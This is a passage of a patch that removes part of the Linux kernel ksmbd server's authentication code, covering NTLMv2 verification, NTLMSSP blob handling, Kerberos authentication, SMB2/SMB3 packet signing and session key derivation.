+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-	0x60, 0x5e, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
+-	0x05, 0x02, 0xa0, 0x54, 0x30, 0x52, 0xa0, 0x24,
+-	0x30, 0x22, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86,
+-	0xf7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x09, 0x2a,
+-	0x86, 0x48, 0x82, 0xf7, 0x12, 0x01, 0x02, 0x02,
+-	0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82,
+-	0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a, 0x30, 0x28,
+-	0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f, 0x74, 0x5f,
+-	0x64, 0x65, 0x66, 0x69, 0x6e, 0x65, 0x64, 0x5f,
+-	0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43, 0x34, 0x31,
+-	0x37, 0x38, 0x40, 0x70, 0x6c, 0x65, 0x61, 0x73,
+-	0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f, 0x72, 0x65
+-#else
+-	0x60, 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
+-	0x05, 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e,
+-	0x30, 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04,
+-	0x01, 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a,
+-	0x30, 0x28, 0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f,
+-	0x74, 0x5f, 0x64, 0x65, 0x66, 0x69, 0x6e, 0x65,
+-	0x64, 0x5f, 0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43,
+-	0x34, 0x31, 0x37, 0x38, 0x40, 0x70, 0x6c, 0x65,
+-	0x61, 0x73, 0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f,
+-	0x72, 0x65
+-#endif
+-};
+-
+-void ksmbd_copy_gss_neg_header(void *buf)
+-{
+-	memcpy(buf, NEGOTIATE_GSS_HEADER, AUTH_GSS_LENGTH);
+-}
+-
+-/**
+- * ksmbd_gen_sess_key() - function to generate session key
+- * @sess:	session of connection
+- * @hash:	source hash value to be used for find session key
+- * @hmac:	source hmac value to be used for finding session key
+- *
+- */
+-static int ksmbd_gen_sess_key(struct ksmbd_session *sess, char *hash,
+-			      char *hmac)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-	int rc;
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+-				 hash,
+-				 CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "hmacmd5 set key fail error %d\n", rc);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not init hmacmd5 error %d\n", rc);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx),
+-				 hmac,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not update with response error %d\n", rc);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), sess->sess_key);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hmacmd5 hash error %d\n", rc);
+-		goto out;
+-	}
+-
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-static int calc_ntlmv2_hash(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			    char *ntlmv2_hash, char *dname)
+-{
+-	int ret, len, conv_len;
+-	wchar_t *domain = NULL;
+-	__le16 *uniname = NULL;
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "can't generate ntlmv2 hash\n");
+-		return -ENOMEM;
+-	}
+-
+-	ret = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+-				  user_passkey(sess->user),
+-				  CIFS_ENCPWD_SIZE);
+-	if (ret) {
+-		ksmbd_debug(AUTH, "Could not set NT Hash as a key\n");
+-		goto out;
+-	}
+-
+-	ret = crypto_shash_init(CRYPTO_HMACMD5(ctx));
+-	if (ret) {
+-		ksmbd_debug(AUTH, "could not init hmacmd5\n");
+-		goto out;
+-	}
+-
+-	/* convert user_name to unicode */
+-	len = strlen(user_name(sess->user));
+-	uniname = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
+-	if (!uniname) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	conv_len = smb_strtoUTF16(uniname, user_name(sess->user), len,
+-				  conn->local_nls);
+-	if (conv_len < 0 || conv_len > len) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
+-	UniStrupr(uniname);
+-
+-	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
+-				  (char *)uniname,
+-				  UNICODE_LEN(conv_len));
+-	if (ret) {
+-		ksmbd_debug(AUTH, "Could not update with user\n");
+-		goto out;
+-	}
+-
+-	/* Convert domain name or conn name to unicode and uppercase */
+-	len = strlen(dname);
+-	domain = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
+-	if (!domain) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	conv_len = smb_strtoUTF16((__le16 *)domain, dname, len,
+-				  conn->local_nls);
+-	if (conv_len < 0 || conv_len > len) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
+-
+-	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
+-				  (char *)domain,
+-				  UNICODE_LEN(conv_len));
+-	if (ret) {
+-		ksmbd_debug(AUTH, "Could not update with domain\n");
+-		goto out;
+-	}
+-
+-	ret = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_hash);
+-	if (ret)
+-		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+-out:
+-	kfree(uniname);
+-	kfree(domain);
+-	ksmbd_release_crypto_ctx(ctx);
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_auth_ntlmv2() - NTLMv2 authentication handler
+- * @sess:	session of connection
+- * @ntlmv2:		NTLMv2 challenge response
+- * @blen:		NTLMv2 blob length
+- * @domain_name:	domain name
+- *
+- * Return:	0 on success, error number on error
+- */
+-int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
+-		      char *cryptkey)
+-{
+-	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+-	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
+-	struct ksmbd_crypto_ctx *ctx = NULL;
+-	char *construct = NULL;
+-	int rc, len;
+-
+-	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
+-		goto out;
+-	}
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+-				 ntlmv2_hash,
+-				 CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not set NTLMV2 Hash as a key\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not init hmacmd5\n");
+-		goto out;
+-	}
+-
+-	len = CIFS_CRYPTO_KEY_SIZE + blen;
+-	construct = kzalloc(len, GFP_KERNEL);
+-	if (!construct) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	memcpy(construct, cryptkey, CIFS_CRYPTO_KEY_SIZE);
+-	memcpy(construct + CIFS_CRYPTO_KEY_SIZE, &ntlmv2->blob_signature, blen);
+-
+-	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx), construct, len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not update with response\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_rsp);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+-		goto out;
+-	}
+-	ksmbd_release_crypto_ctx(ctx);
+-	ctx = NULL;
+-
+-	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate sess key\n");
+-		goto out;
+-	}
+-
+-	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
+-		rc = -EINVAL;
+-out:
+-	if (ctx)
+-		ksmbd_release_crypto_ctx(ctx);
+-	kfree(construct);
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_decode_ntlmssp_auth_blob() - helper function to construct
+- * authenticate blob
+- * @authblob:	authenticate blob source pointer
+- * @usr:	user details
+- * @sess:	session of connection
+- *
+- * Return:	0 on success, error number on error
+- */
+-int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+-				   int blob_len, struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess)
+-{
+-	char *domain_name;
+-	unsigned int nt_off, dn_off;
+-	unsigned short nt_len, dn_len;
+-	int ret;
+-
+-	if (blob_len < sizeof(struct authenticate_message)) {
+-		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
+-			    blob_len);
+-		return -EINVAL;
+-	}
+-
+-	if (memcmp(authblob->Signature, "NTLMSSP", 8)) {
+-		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
+-			    authblob->Signature);
+-		return -EINVAL;
+-	}
+-
+-	nt_off = le32_to_cpu(authblob->NtChallengeResponse.BufferOffset);
+-	nt_len = le16_to_cpu(authblob->NtChallengeResponse.Length);
+-	dn_off = le32_to_cpu(authblob->DomainName.BufferOffset);
+-	dn_len = le16_to_cpu(authblob->DomainName.Length);
+-
+-	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len ||
+-	    nt_len < CIFS_ENCPWD_SIZE)
+-		return -EINVAL;
+-
+-	/* TODO : use domain name that imported from configuration file */
+-	domain_name = smb_strndup_from_utf16((const char *)authblob + dn_off,
+-					     dn_len, true, conn->local_nls);
+-	if (IS_ERR(domain_name))
+-		return PTR_ERR(domain_name);
+-
+-	/* process NTLMv2 authentication */
+-	ksmbd_debug(AUTH, "decode_ntlmssp_authenticate_blob dname%s\n",
+-		    domain_name);
+-	ret = ksmbd_auth_ntlmv2(conn, sess,
+-				(struct ntlmv2_resp *)((char *)authblob + nt_off),
+-				nt_len - CIFS_ENCPWD_SIZE,
+-				domain_name, conn->ntlmssp.cryptkey);
+-	kfree(domain_name);
+-
+-	/* The recovered secondary session key */
+-	if (conn->ntlmssp.client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) {
+-		struct arc4_ctx *ctx_arc4;
+-		unsigned int sess_key_off, sess_key_len;
+-
+-		sess_key_off = le32_to_cpu(authblob->SessionKey.BufferOffset);
+-		sess_key_len = le16_to_cpu(authblob->SessionKey.Length);
+-
+-		if (blob_len < (u64)sess_key_off + sess_key_len)
+-			return -EINVAL;
+-
+-		ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
+-		if (!ctx_arc4)
+-			return -ENOMEM;
+-
+-		cifs_arc4_setkey(ctx_arc4, sess->sess_key,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-		cifs_arc4_crypt(ctx_arc4, sess->sess_key,
+-				(char *)authblob + sess_key_off, sess_key_len);
+-		kfree_sensitive(ctx_arc4);
+-	}
+-
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_decode_ntlmssp_neg_blob() - helper function to construct
+- * negotiate blob
+- * @negblob: negotiate blob source pointer
+- * @rsp:     response header pointer to be updated
+- * @sess:    session of connection
+- *
+- */
+-int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
+-				  int blob_len, struct ksmbd_conn *conn)
+-{
+-	if (blob_len < sizeof(struct negotiate_message)) {
+-		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
+-			    blob_len);
+-		return -EINVAL;
+-	}
+-
+-	if (memcmp(negblob->Signature, "NTLMSSP", 8)) {
+-		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
+-			    negblob->Signature);
+-		return -EINVAL;
+-	}
+-
+-	conn->ntlmssp.client_flags = le32_to_cpu(negblob->NegotiateFlags);
+-	return 0;
+-}
+-
+-/**
+- * ksmbd_build_ntlmssp_challenge_blob() - helper function to construct
+- * challenge blob
+- * @chgblob: challenge blob source pointer to initialize
+- * @rsp:     response header pointer to be updated
+- * @sess:    session of connection
+- *
+- */
+-unsigned int
+-ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
+-				   struct ksmbd_conn *conn)
+-{
+-	struct target_info *tinfo;
+-	wchar_t *name;
+-	__u8 *target_name;
+-	unsigned int flags, blob_off, blob_len, type, target_info_len = 0;
+-	int len, uni_len, conv_len;
+-	int cflags = conn->ntlmssp.client_flags;
+-
+-	memcpy(chgblob->Signature, NTLMSSP_SIGNATURE, 8);
+-	chgblob->MessageType = NtLmChallenge;
+-
+-	flags = NTLMSSP_NEGOTIATE_UNICODE |
+-		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_TARGET_TYPE_SERVER |
+-		NTLMSSP_NEGOTIATE_TARGET_INFO;
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_SIGN) {
+-		flags |= NTLMSSP_NEGOTIATE_SIGN;
+-		flags |= cflags & (NTLMSSP_NEGOTIATE_128 |
+-				   NTLMSSP_NEGOTIATE_56);
+-	}
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_SEAL && smb3_encryption_negotiated(conn))
+-		flags |= NTLMSSP_NEGOTIATE_SEAL;
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_ALWAYS_SIGN)
+-		flags |= NTLMSSP_NEGOTIATE_ALWAYS_SIGN;
+-
+-	if (cflags & NTLMSSP_REQUEST_TARGET)
+-		flags |= NTLMSSP_REQUEST_TARGET;
+-
+-	if (conn->use_spnego &&
+-	    (cflags & NTLMSSP_NEGOTIATE_EXTENDED_SEC))
+-		flags |= NTLMSSP_NEGOTIATE_EXTENDED_SEC;
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_KEY_XCH)
+-		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
+-
+-	chgblob->NegotiateFlags = cpu_to_le32(flags);
+-	len = strlen(ksmbd_netbios_name());
+-	name = kmalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
+-	if (!name)
+-		return -ENOMEM;
+-
+-	conv_len = smb_strtoUTF16((__le16 *)name, ksmbd_netbios_name(), len,
+-				  conn->local_nls);
+-	if (conv_len < 0 || conv_len > len) {
+-		kfree(name);
+-		return -EINVAL;
+-	}
+-
+-	uni_len = UNICODE_LEN(conv_len);
+-
+-	blob_off = sizeof(struct challenge_message);
+-	blob_len = blob_off + uni_len;
+-
+-	chgblob->TargetName.Length = cpu_to_le16(uni_len);
+-	chgblob->TargetName.MaximumLength = cpu_to_le16(uni_len);
+-	chgblob->TargetName.BufferOffset = cpu_to_le32(blob_off);
+-
+-	/* Initialize random conn challenge */
+-	get_random_bytes(conn->ntlmssp.cryptkey, sizeof(__u64));
+-	memcpy(chgblob->Challenge, conn->ntlmssp.cryptkey,
+-	       CIFS_CRYPTO_KEY_SIZE);
+-
+-	/* Add Target Information to security buffer */
+-	chgblob->TargetInfoArray.BufferOffset = cpu_to_le32(blob_len);
+-
+-	target_name = (__u8 *)chgblob + blob_off;
+-	memcpy(target_name, name, uni_len);
+-	tinfo = (struct target_info *)(target_name + uni_len);
+-
+-	chgblob->TargetInfoArray.Length = 0;
+-	/* Add target info list for NetBIOS/DNS settings */
+-	for (type = NTLMSSP_AV_NB_COMPUTER_NAME;
+-	     type <= NTLMSSP_AV_DNS_DOMAIN_NAME; type++) {
+-		tinfo->Type = cpu_to_le16(type);
+-		tinfo->Length = cpu_to_le16(uni_len);
+-		memcpy(tinfo->Content, name, uni_len);
+-		tinfo = (struct target_info *)((char *)tinfo + 4 + uni_len);
+-		target_info_len += 4 + uni_len;
+-	}
+-
+-	/* Add terminator subblock */
+-	tinfo->Type = 0;
+-	tinfo->Length = 0;
+-	target_info_len += 4;
+-
+-	chgblob->TargetInfoArray.Length = cpu_to_le16(target_info_len);
+-	chgblob->TargetInfoArray.MaximumLength = cpu_to_le16(target_info_len);
+-	blob_len += target_info_len;
+-	kfree(name);
+-	ksmbd_debug(AUTH, "NTLMSSP SecurityBufferLength %d\n", blob_len);
+-	return blob_len;
+-}
+-
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
+-			    int in_len, char *out_blob, int *out_len)
+-{
+-	struct ksmbd_spnego_authen_response *resp;
+-	struct ksmbd_user *user = NULL;
+-	int retval;
+-
+-	resp = ksmbd_ipc_spnego_authen_request(in_blob, in_len);
+-	if (!resp) {
+-		ksmbd_debug(AUTH, "SPNEGO_AUTHEN_REQUEST failure\n");
+-		return -EINVAL;
+-	}
+-
+-	if (!(resp->login_response.status & KSMBD_USER_FLAG_OK)) {
+-		ksmbd_debug(AUTH, "krb5 authentication failure\n");
+-		retval = -EPERM;
+-		goto out;
+-	}
+-
+-	if (*out_len <= resp->spnego_blob_len) {
+-		ksmbd_debug(AUTH, "buf len %d, but blob len %d\n",
+-			    *out_len, resp->spnego_blob_len);
+-		retval = -EINVAL;
+-		goto out;
+-	}
+-
+-	if (resp->session_key_len > sizeof(sess->sess_key)) {
+-		ksmbd_debug(AUTH, "session key is too long\n");
+-		retval = -EINVAL;
+-		goto out;
+-	}
+-
+-	user = ksmbd_alloc_user(&resp->login_response);
+-	if (!user) {
+-		ksmbd_debug(AUTH, "login failure\n");
+-		retval = -ENOMEM;
+-		goto out;
+-	}
+-	sess->user = user;
+-
+-	memcpy(sess->sess_key, resp->payload, resp->session_key_len);
+-	memcpy(out_blob, resp->payload + resp->session_key_len,
+-	       resp->spnego_blob_len);
+-	*out_len = resp->spnego_blob_len;
+-	retval = 0;
+-out:
+-	kvfree(resp);
+-	return retval;
+-}
+-#else
+-int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
+-			    int in_len, char *out_blob, int *out_len)
+-{
+-	return -EOPNOTSUPP;
+-}
+-#endif
+-
+-/**
+- * ksmbd_sign_smb2_pdu() - function to generate packet signing
+- * @conn:	connection
+- * @key:	signing key
+- * @iov:        buffer iov array
+- * @n_vec:	number of iovecs
+- * @sig:	signature value generated for client request packet
+- *
+- */
+-int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-	int rc, i;
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacsha256();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacsha256\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
+-				 key,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc)
+-		goto out;
+-
+-	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
+-		goto out;
+-	}
+-
+-	for (i = 0; i < n_vec; i++) {
+-		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
+-					 iov[i].iov_base,
+-					 iov[i].iov_len);
+-		if (rc) {
+-			ksmbd_debug(AUTH, "hmacsha256 update error %d\n", rc);
+-			goto out;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), sig);
+-	if (rc)
+-		ksmbd_debug(AUTH, "hmacsha256 generation error %d\n", rc);
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_sign_smb3_pdu() - function to generate packet signing
+- * @conn:	connection
+- * @key:	signing key
+- * @iov:        buffer iov array
+- * @n_vec:	number of iovecs
+- * @sig:	signature value generated for client request packet
+- *
+- */
+-int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-	int rc, i;
+-
+-	ctx = ksmbd_crypto_ctx_find_cmacaes();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc cmac\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_CMACAES_TFM(ctx),
+-				 key,
+-				 SMB2_CMACAES_SIZE);
+-	if (rc)
+-		goto out;
+-
+-	rc = crypto_shash_init(CRYPTO_CMACAES(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "cmaces init error %d\n", rc);
+-		goto out;
+-	}
+-
+-	for (i = 0; i < n_vec; i++) {
+-		rc = crypto_shash_update(CRYPTO_CMACAES(ctx),
+-					 iov[i].iov_base,
+-					 iov[i].iov_len);
+-		if (rc) {
+-			ksmbd_debug(AUTH, "cmaces update error %d\n", rc);
+-			goto out;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_CMACAES(ctx), sig);
+-	if (rc)
+-		ksmbd_debug(AUTH, "cmaces generation error %d\n", rc);
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-struct derivation {
+-	struct kvec label;
+-	struct kvec context;
+-	bool binding;
+-};
+-
+-static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			struct kvec label, struct kvec context, __u8 *key,
+-			unsigned int key_size)
+-{
+-	unsigned char zero = 0x0;
+-	__u8 i[4] = {0, 0, 0, 1};
+-	__u8 L128[4] = {0, 0, 0, 128};
+-	__u8 L256[4] = {0, 0, 1, 0};
+-	int rc;
+-	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
+-	unsigned char *hashptr = prfhash;
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
+-	memset(key, 0x0, key_size);
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacsha256();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacsha256\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
+-				 sess->sess_key,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc)
+-		goto smb3signkey_ret;
+-
+-	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), i, 4);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
+-				 label.iov_base,
+-				 label.iov_len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with label\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), &zero, 1);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with zero\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
+-				 context.iov_base,
+-				 context.iov_len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with context\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
+-	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
+-	else
+-		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with L\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), hashptr);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hmacsha256 hash error %d\n",
+-			    rc);
+-		goto smb3signkey_ret;
+-	}
+-
+-	memcpy(key, hashptr, key_size);
+-
+-smb3signkey_ret:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-static int generate_smb3signingkey(struct ksmbd_session *sess,
+-				   struct ksmbd_conn *conn,
+-				   const struct derivation *signing)
+-{
+-	int rc;
+-	struct channel *chann;
+-	char *key;
+-
+-	chann = lookup_chann_list(sess, conn);
+-	if (!chann)
+-		return 0;
+-
+-	if (conn->dialect >= SMB30_PROT_ID && signing->binding)
+-		key = chann->smb3signingkey;
+-	else
+-		key = sess->smb3signingkey;
+-
+-	rc = generate_key(conn, sess, signing->label, signing->context, key,
+-			  SMB3_SIGN_KEY_SIZE);
+-	if (rc)
+-		return rc;
+-
+-	if (!(conn->dialect >= SMB30_PROT_ID && signing->binding))
+-		memcpy(chann->smb3signingkey, key, SMB3_SIGN_KEY_SIZE);
+-
+-	ksmbd_debug(AUTH, "dumping generated AES signing keys\n");
+-	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
+-	ksmbd_debug(AUTH, "Session Key   %*ph\n",
+-		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
+-	ksmbd_debug(AUTH, "Signing Key   %*ph\n",
+-		    SMB3_SIGN_KEY_SIZE, key);
+-	return 0;
+-}
+-
+-int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
+-			       struct ksmbd_conn *conn)
+-{
+-	struct derivation d;
+-
+-	d.label.iov_base = "SMB2AESCMAC";
+-	d.label.iov_len = 12;
+-	d.context.iov_base = "SmbSign";
+-	d.context.iov_len = 8;
+-	d.binding = conn->binding;
+-
+-	return generate_smb3signingkey(sess, conn, &d);
+-}
+-
+-int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
+-				struct ksmbd_conn *conn)
+-{
+-	struct derivation d;
+-
+-	d.label.iov_base = "SMBSigningKey";
+-	d.label.iov_len = 14;
+-	if (conn->binding) {
+-		struct preauth_session *preauth_sess;
+-
+-		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
+-		if (!preauth_sess)
+-			return -ENOENT;
+-		d.context.iov_base = preauth_sess->Preauth_HashValue;
+-	} else {
+-		d.context.iov_base = sess->Preauth_HashValue;
+-	}
+-	d.context.iov_len = 64;
+-	d.binding = conn->binding;
+-
+-	return generate_smb3signingkey(sess, conn, &d);
+-}
+-
+-struct derivation_twin {
+-	struct derivation encryption;
+-	struct derivation decryption;
+-};
+-
+-static int generate_smb3encryptionkey(struct ksmbd_conn *conn,
+-				      struct ksmbd_session *sess,
+-				      const struct derivation_twin *ptwin)
+-{
+-	int rc;
+-
+-	rc = generate_key(conn, sess, ptwin->encryption.label,
+-			  ptwin->encryption.context, sess->smb3encryptionkey,
+-			  SMB3_ENC_DEC_KEY_SIZE);
+-	if (rc)
+-		return rc;
+-
+-	rc = generate_key(conn, sess, ptwin->decryption.label,
+-			  ptwin->decryption.context,
+-			  sess->smb3decryptionkey, SMB3_ENC_DEC_KEY_SIZE);
+-	if (rc)
+-		return rc;
+-
+-	ksmbd_debug(AUTH, "dumping generated AES encryption keys\n");
+-	ksmbd_debug(AUTH, "Cipher type   %d\n", conn->cipher_type);
+-	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
+-	ksmbd_debug(AUTH, "Session Key   %*ph\n",
+-		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
+-		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
+-			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3encryptionkey);
+-		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
+-			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3decryptionkey);
+-	} else {
+-		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
+-			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3encryptionkey);
+-		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
+-			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3decryptionkey);
+-	}
+-	return 0;
+-}
+-
+-int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
+-				  struct ksmbd_session *sess)
+-{
+-	struct derivation_twin twin;
+-	struct derivation *d;
+-
+-	d = &twin.encryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
+-	d->context.iov_base = "ServerOut";
+-	d->context.iov_len = 10;
+-
+-	d = &twin.decryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
